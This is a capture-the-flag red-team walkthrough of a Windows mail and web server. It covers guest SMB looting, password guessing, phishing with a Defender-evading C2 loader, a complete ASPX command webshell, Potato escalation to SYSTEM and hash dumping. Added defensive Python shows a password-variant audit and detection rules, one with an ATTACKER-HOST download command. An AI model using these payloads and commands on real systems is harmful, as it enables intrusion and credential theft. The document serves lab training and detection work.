Syk0

Evasive


This box is provided by HackSmarter https://www.hacksmarter.org/

Objective and Scope

You are tasked with conducting a small red team operation on a Mail and Web Windows Server. The objective is to gain system access and extract any sensitive information that a threat actor could potentially use.

Here are some of the rules of engagement:

  1. The mail component is equipped with an anti-bruteforce mechanism. Do not get locked out, as this will trip an alert and end the operation.
  2. Defender is on and up-to-date.

Overview

Evasive is a HackSmarter red team simulation targeting a dual-purpose Windows Server running both a mail service and a web server. The engagement requires operating covertly - Windows Defender is active and up-to-date, and the mail server has anti-bruteforce protections in place that will terminate the operation if triggered.

The attack chain follows a realistic adversarial path:

  1. Recon - Enumerate open ports and services. Discover an accessible SMB share as a guest user containing internal PDF documents. Extract usernames and a default password from the PDF metadata. Identify that one user (roger) has an updated variation of the default password and can authenticate to the mail service.
  2. Foothold - Leverage the mail service to send a spear-phishing email to a target user (alfonso) with a malicious executable attached. The executable is a custom Rust-based loader that spawns an Adaptix C2 beacon, bypassing Defender. Wait for the callback and establish an agent on the target system.
  3. Post-Exploitation - Run Seatbelt for situational awareness. Locate and download sensitive files including a KeePass database, a PowerShell script, and a scheduled task binary. Decompile the binary to recover cleartext credentials. Extract the KeePass master password from process command-line history and open the database to retrieve the credit card flag.
  4. Privilege Escalation - Identify write access to the IIS webroot. Upload an ASPX webshell and use it to download and execute the Rust loader under the IIS service account context. Attempt GodPotato (detected), pivot to EfsPotato (undetected), and escalate to SYSTEM. Dump the local administrator NTLM hash using an Adaptix BOF.

Recon

Port Scanning

We begin with a standard Nmap scan to enumerate open services on the target. We run two scans in parallel: a default script and version scan against common ports, and a full all-ports scan to catch anything non-standard.

sudo nmap -sC -sV -vv -oA tcp 10.1.215.3 && sudo nmap -sC -sV -vv -p- -oA allports 10.1.215.3

The scan reveals the target is a Windows machine with HTTP (port 80), SMB (port 445), and mail-related ports open. This confirms the dual web/mail role described in the engagement brief.

Web Enumeration

We navigate to port 80 and find the default IIS welcome page, indicating a fresh or lightly configured Windows web server. No custom application is immediately visible.

We run a directory brute-force against the web server using ffuf with a large lowercase wordlist to discover any hidden endpoints, virtual paths, or hosted applications.

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -u http://10.1.215.3/FUZZ -ic

While ffuf runs in the background, we pivot to enumerating the SMB service in parallel.

SMB Enumeration

We probe SMB using NetExec (nxc) with null/guest authentication to check what shares are accessible without credentials.

nxc smb 10.1.215.3 -u 'guest' -p '' --shares

The guest account has read access to at least one share - a significant misconfiguration on a corporate server. We use the spider_plus module to recursively enumerate all accessible files across available shares, writing the output to the current directory for review.

nxc smb 10.1.215.3 -u 'guest' -p '' -M spider_plus -o OUTPUT_FOLDER=.

The spider output reveals two PDF files in a docs share:

{
    "docs": {
        "mail_doc.pdf": {
            "atime_epoch": "2025-10-12 15:20:03",
            "ctime_epoch": "2025-10-12 15:20:01",
            "mtime_epoch": "2025-10-12 15:20:03",
            "size": "1.48 KB"
        },
        "old_user_setup_doc.pdf": {
            "atime_epoch": "2025-10-12 15:19:29",
            "ctime_epoch": "2025-10-12 15:19:29",
            "mtime_epoch": "2025-10-12 15:22:48",
            "size": "5.06 KB"
        }
    }
}

These look like internal IT documentation. We download both files by re-running spider_plus with the DOWNLOAD_FLAG option enabled.

nxc smb 10.1.215.3 -u 'guest' -p '' -M spider_plus -o OUTPUT_FOLDER=. DOWNLOAD_FLAG=True

PDF Metadata Extraction

Once the PDFs are downloaded locally, we use exiftool to extract their embedded metadata. PDF documents often retain author information, creation software, and other identifying details that were set when the document was created.

exiftool mail_doc.pdf > mail_exif
exiftool old_user_setup_doc.pdf > users_exif

The metadata reveals two usernames: roger and alfonso. These are likely internal employees and valid mail/system accounts on the target.

Reviewing the content of mail_doc.pdf, we learn that Alfonso is expecting an executable file from Roger over email. This is a critical piece of intelligence - it gives us a pretext to send a malicious executable to Alfonso that he will be likely to open, since he is already expecting one from Roger.

The old_user_setup_doc.pdf appears to be an old onboarding or IT setup document. It contains a default password for new users: NewUser2024!.

Credential Validation

We test the discovered default password against both users on the mail service and any other available authentication surface. The 2024 password variant does not work for either account.

Given the NewUser2024! pattern, we try NewUser2025! as a natural year-increment variation - a common behavior when users are forced to update passwords annually without changing the base pattern. We attempt this against Roger's mailbox on the mail server.

Failed attempt:

Successful attempt:

Roger's mailbox is accessible with NewUser2025!. We now have valid mail credentials. We confirm access using sendemail before proceeding to the foothold phase.

sendemail -s winserver01.hs -f [email protected] -t [email protected] -m "Job Application" -xu [email protected] -xp 'NewUser2025!'
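The year-increment guess above is exactly the pattern a password filter or periodic audit should catch. The following is an added example (not from the page or from HackSmarter) that normalizes a candidate password by collapsing four-digit years and other digit runs, so a rotated copy of a known onboarding default is rejected; the single default in KNOWN_DEFAULTS is the one reported above, and the audit-input framing is an assumption.

```python
import re

# Base passwords harvested from onboarding material such as old_user_setup_doc.pdf;
# the single value here is the one the page reports, supplied as audit input.
KNOWN_DEFAULTS = ["NewUser2024!"]

YEAR = re.compile(r"(?:19|20)\d{2}")
DIGITS = re.compile(r"\d+")

def normalize(pw):
    """Lowercase, then collapse any 4-digit year to <YEAR> and any other digit run to <N>,
    so NewUser2024!, NewUser2025! and newuser2026! all map to newuser<YEAR>!."""
    return DIGITS.sub("<N>", YEAR.sub("<YEAR>", pw.lower()))

def is_default_variant(candidate, defaults=KNOWN_DEFAULTS):
    """True when the candidate is a known default or a year-rotated / counter-bumped copy."""
    norm = normalize(candidate)
    return any(norm == normalize(d) for d in defaults)

def audit(candidates, defaults=KNOWN_DEFAULTS):
    """Return the candidates a password filter or periodic audit should reject."""
    return [c for c in candidates if is_default_variant(c, defaults)]
```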

Foothold

Payload Generation and Delivery

With confirmed access to Roger's mail account and the knowledge that Alfonso is expecting an executable from Roger, we set up our phishing delivery. We use a custom Rust-based loader https://github.com/0xsyk0/RustHarder to generate a binary (rr.exe) that, when executed, spawns an Adaptix C2 beacon back to our listener. The Rust loader is chosen specifically for its ability to evade Windows Defender, as it avoids common shellcode patterns and memory signatures that signature-based AV typically detects.

We send the malicious executable to Alfonso as an email attachment, impersonating Roger using his compromised credentials:

sendemail -s winserver01.hs -f [email protected] -t [email protected] -m "Exe app" -xu [email protected] -xp 'NewUser2025!' -a rr.exe

Alfonso is expecting this file, so the likelihood of execution is high. We wait for a callback on our Adaptix listener.

C2 Beacon Callback

The payload executes on Alfonso's machine and connects back to our Adaptix C2 framework. We now have an active agent running under Alfonso's user context.

Post-Exploitation Enumeration

With the agent active, we run Seatbelt - a comprehensive C# host enumeration tool that collects a wide range of system and user configuration data including running processes, scheduled tasks, installed software, credential manager entries, environment variables, and more. This gives us a full picture of the environment and helps identify privilege escalation paths and sensitive data locations. Note that Seatbelt can take around 20 minutes to complete a full run.

Sensitive File Discovery and Extraction

From the Seatbelt output and manual exploration, we identify several high-value files to download:

  • Database.kdbx - A KeePass password database, likely containing stored credentials
  • mail.ps1 - A PowerShell script related to the mail functionality, potentially containing hardcoded credentials
  • C:\Windows\Tasks\mail\mail.exe - A scheduled task binary, suspicious due to its non-standard location under Tasks

We download all three files to our local machine for offline analysis.

Binary Decompilation

We decompile mail.exe using a .NET decompiler (such as dnSpy or ILSpy). The binary is a .NET assembly and its logic is fully recoverable in cleartext. Inside, we find the cleartext password for Alfonso's account hardcoded into the binary - likely used by the scheduled task to authenticate to the mail service programmatically.

Sensitive Document Discovery

During filesystem enumeration via the agent, we locate a file named merger_info.pdf. This appears to be confidential internal business documentation - the kind of sensitive information that a real threat actor would be most interested in exfiltrating.

KeePass Master Password Recovery

We check the process list and the command-line arguments of running processes for sensitive data. Windows keeps the full command line of every running process (and, where command-line auditing or Sysmon is enabled, also writes it to the event log), and it is common for administrators or scripts to pass credentials as arguments. In the process command-line history, we find the KeePass master password being passed as a parameter:

kWc42J10XfiNdQD

We use this password to open Database.kdbx locally and extract the stored credentials. The database contains credit card information, which serves as the flag for this engagement.


Privilege Escalation

IIS Webroot Write Access

During post-exploitation enumeration, we discover that Alfonso's user account has write access to the IIS webroot (C:\inetpub\wwwroot). This is a critical misconfiguration - any user who can write files to the webroot can place executable server-side scripts that will run under the IIS application pool identity.

ASPX Webshell Upload

We upload a classic ASPX webshell to the webroot. This shell accepts a command parameter via an HTTP POST request and executes it server-side using cmd.exe, returning the output to the browser. The IIS worker process (w3wp.exe) runs as a dedicated service account, giving us a new execution context separate from Alfonso.

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
 
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!--    http://michaeldaw.org   04/2007    -->

Second Beacon via IIS

Using the webshell, we issue a PowerShell command to download the Rust loader binary from our attacker-controlled server and save it to C:\Windows\Tasks\rr.exe - a writable location that blends in with the existing scheduled task artifacts.

We then use the webshell to execute the binary:

A new Adaptix agent connects back to our listener, this time running as the IIS service account (IIS APPPOOL\...). IIS application pool identities hold SeImpersonatePrivilege by default, a right that standard users lack.
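Two of the findings so far are visible in process-creation telemetry: the KeePass master password passed on a command line (KeePass Master Password Recovery) and w3wp.exe spawning a shell that stages a binary under C:\Windows\Tasks (this section). The block below is an added detection example, not code from the page or from HackSmarter; the sample events are constructed with fields modelled on Sysmon Event ID 1 / Security 4688, and the host name, paths and secret value are placeholders.

```python
import re
from ntpath import basename

# Constructed process-creation records with fields modelled on Sysmon Event ID 1 /
# Security 4688. Paths, the host name and the secret are placeholders, not engagement data.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\KeePass\KeePass.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\KeePass\KeePass.exe" Database.kdbx -pw:PLACEHOLDER_SECRET'},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'cmd.exe /c powershell -c "Invoke-WebRequest http://ATTACKER-HOST/rr.exe -OutFile C:\Windows\Tasks\rr.exe"'},
    {"Image": r"C:\Windows\Tasks\mail\mail.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\Tasks\mail\mail.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# KeePass's -pw: switch plus generic --password=/pass: forms; group 2 is the secret itself.
CRED_ARG = re.compile(r"(?i)(-pw:|-{1,2}pass(?:word)?[=: ])(\S+)")

def credential_on_cmdline(ev):
    return CRED_ARG.search(ev["CommandLine"]) is not None

def shell_spawned_by_iis(ev):
    # w3wp.exe launching a shell is the webshell signature; it is rarely legitimate.
    return (basename(ev["ParentImage"]).lower() == "w3wp.exe"
            and basename(ev["Image"]).lower() in SHELLS)

def touches_tasks_dir(ev):
    # Binaries living in or written to C:\Windows\Tasks warrant review.
    return "c:\\windows\\tasks\\" in (ev["Image"] + " " + ev["CommandLine"]).lower()

RULES = {"credential_on_cmdline": credential_on_cmdline,
         "shell_spawned_by_iis": shell_spawned_by_iis,
         "touches_tasks_dir": touches_tasks_dir}

def redact(cmdline):
    """Mask the secret before the alert leaves the host, so the SIEM does not re-expose it."""
    return CRED_ARG.sub(lambda m: m.group(1) + "***", cmdline)

def triage(events):
    """Map event index -> names of the rules it trips; events tripping nothing are omitted."""
    hits = {}
    for i, ev in enumerate(events):
        names = [name for name, rule in RULES.items() if rule(ev)]
        if names:
            hits[i] = names
    return hits
```

Run triage over the sample set and pass any credential-bearing command line through redact before forwarding the alert.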

Potato Privilege Escalation

With a service account context, we attempt Potato-family privilege escalation techniques, which abuse Windows token impersonation privileges (SeImpersonatePrivilege) that are granted to service accounts by default. These techniques allow a process with impersonation rights to escalate to SYSTEM by coercing a privileged Windows service into authenticating to an attacker-controlled pipe or endpoint.

We first try GodPotato, a modern Potato variant effective on Windows Server 2019+. However, Defender detects and blocks the GodPotato binary.

We pivot to EfsPotato, which abuses the Windows Encrypting File System (EFS) RPC interface to achieve the same impersonation goal through a different code path. EfsPotato is not detected by Defender in this configuration.

EfsPotato successfully elevates our context to SYSTEM.

Credential Dumping

With SYSTEM-level access, we use an Adaptix BOF (Beacon Object File) to perform a hashdump - extracting NTLM hashes from the local SAM database. This yields the local Administrator hash, which can be used for Pass-the-Hash attacks, offline cracking, or lateral movement to other machines in the environment that share the same local admin password. Per-host random local administrator passwords (for example via Windows LAPS) close that lateral-movement path.